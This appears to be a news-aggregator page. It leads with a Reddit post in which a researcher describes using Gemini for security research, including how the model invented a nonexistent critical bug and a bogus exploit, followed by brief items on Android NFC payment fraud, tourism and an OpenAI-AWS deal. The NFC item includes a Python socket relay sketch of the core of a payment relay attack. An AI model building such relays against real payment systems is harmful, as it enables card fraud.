For those of you who are afraid that AI will take over security research

https://preview.redd.it/jaqmpygbu1zf1.png?width=1624&format=png&auto=webp&s=532abe8eb9e3ce54c7b113197b0d9e951540be4c

I’ve been using it as an assistant for a few months. For coding it’s good at generating basic slop code which I can convert into something meaningful. A few weeks ago I decided to give it a try in security research. There are use cases where it can help me: making sure I understand a piece of code right, or, when I can’t find a missing piece, feeding it a few files and asking it to find what I’m looking for, then doing a deeper dive into the place it points me to. Overall I feel it complements me well. I have ADHD and can overlook boring areas; I operate on a higher level of abstraction, tend to be drawn to architectural bugs, and get bored digging into lower-level stuff, which is where this thing does a better job.

What I can say, though, is that I don’t see it being able to conduct code analysis on its own and find quality vulnerabilities. What it does is extremely superficial, and most of the time a false positive. It’s also absolutely unable to spot cross-component bugs unless you explicitly start asking scenario-specific questions. Not sure how this newly released GPT-5 scanner will behave; I have low expectations, tbh, largely because of the context window. Most of the bugs I’ve found required me to keep context/state in my head, which the AI does not do. So idk. Maybe it will find high-level, single-block bugs, contaminated with meaningless garbage that will take time to filter through. At least for now. They also say it’ll be patching those “bugs” right away; I wouldn’t let it do that autonomously.
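To make that workflow concrete: here is a minimal sketch of the “feed it a few files, ask a scenario-specific question” loop, assuming the google-generativeai Python package and an API key in GEMINI_API_KEY. The file paths, the model name string, and the question are illustrative placeholders, not taken from my sessions.

```python
import os
from pathlib import Path

import google.generativeai as genai  # pip install google-generativeai

genai.configure(api_key=os.environ["GEMINI_API_KEY"])
# Model name is an assumption; check what your account actually exposes.
model = genai.GenerativeModel("gemini-2.5-pro")

# Hypothetical files that together hold the cross-component flow in question.
files = ["src/auth/session.c", "src/net/handler.c"]
sources = "\n\n".join(f"--- {p} ---\n{Path(p).read_text()}" for p in files)

# A pointed, scenario-specific question. Generic "find vulnerabilities"
# prompts mostly return superficial noise and false positives.
question = (
    "Trace how the session token created in session.c reaches handler.c. "
    "Is it revalidated before the privileged branch? If not, quote the "
    "exact lines where the check goes missing."
)

response = model.generate_content(sources + "\n\n" + question)
print(response.text)  # treat this as a lead to verify by hand, not a finding
```

The scenario-specific question is the whole trick: it hands the model the cross-component context it won’t build on its own, and its answer is a pointer for a deeper manual dive, not a finding.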

I can definitely see how young, overly excited minds can use this tool to flood bug bounty programs with highly technical BS reports.

The screenshot shows a piece of my conversation with it yesterday. It was describing to me a potential exploit for a “critical” bug it had found in one of the pieces we were looking at. The bug, btw, didn’t exist either. And not only was the exploit BS, but even if the brute-force time didn’t run to multiple lifetimes, it would still be irrelevant, again because it was not holding the whole context. The model is Gemini 2.5 Pro; I think it has a 1M-token context window, while GPT-5 has 400K.
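For a sense of what “multiple lifetimes” means here, the arithmetic is simple; the keyspace and guess rate below are illustrative assumptions, not numbers from that conversation:

```python
# Back-of-the-envelope brute-force time: a 128-bit keyspace at a
# (very generous) 10^12 guesses per second.
keyspace = 2**128
rate = 10**12                        # guesses per second
years = keyspace / rate / (60 * 60 * 24 * 365)
print(f"{years:.2e} years")          # ~1.08e+19 years; the universe is ~1.4e10
```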

submitted by /u/unknow_feature

Read More >>

Android Apps misusing NFC and HCE to steal payment data on the rise

Zimperium zLabs researchers spotted over 760 Android apps abusing Near-Field Communication (NFC) and Host Card Emulation (HCE) to steal payment data and commit fraud, showing rapid growth in NFC relay attacks since April 2024 […]
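For background on the mechanism: a relay attack works because the APDU exchange between a payment terminal and a card is just bytes with no proximity binding, so a middleman can pair a victim’s phone (emulating a card via HCE) with a mule device held at a terminal. Below is a conceptual sketch of that pairing, with invented ports and framing; it is not based on anything in the Zimperium report.

```python
import socket
import threading

def pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy raw APDU traffic one way until either side closes."""
    while chunk := src.recv(4096):
        dst.sendall(chunk)

def main() -> None:
    # One listener for the "card side" (the victim's phone running an HCE
    # app), one for the "reader side" (the mule device at the terminal).
    card_srv = socket.create_server(("0.0.0.0", 9001))
    reader_srv = socket.create_server(("0.0.0.0", 9002))
    card, _ = card_srv.accept()
    reader, _ = reader_srv.accept()
    # Full duplex: terminal commands flow to the emulated card, responses
    # flow back. Physical distance between the two ends no longer matters.
    threading.Thread(target=pump, args=(reader, card), daemon=True).start()
    pump(card, reader)

if __name__ == "__main__":
    main()
```

The point of the sketch is the architectural gap: nothing in the byte stream ties the card to the terminal’s location, which is what makes pure relaying viable.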

Read More >>

Authenticity attracts travelers to Indigenous tourism

Pouring a cup of tea from her thermos, Indigenous guide Talaysay Campo explains the local ingredients and significance of the tea to her guests while they sit amongst the towering Douglas fir trees in Stanley Park. Although the park is one of the top t…

Read More >>

As part of the AWS deal, OpenAI says it will immediately begin running workloads on AWS infrastructure, tapping hundreds of thousands of Nvidia GPUs in the US (MacKenzie Sigalos/CNBC)

MacKenzie Sigalos / CNBC:
OpenAI has signed a deal to buy $38 billion w…

Read More >>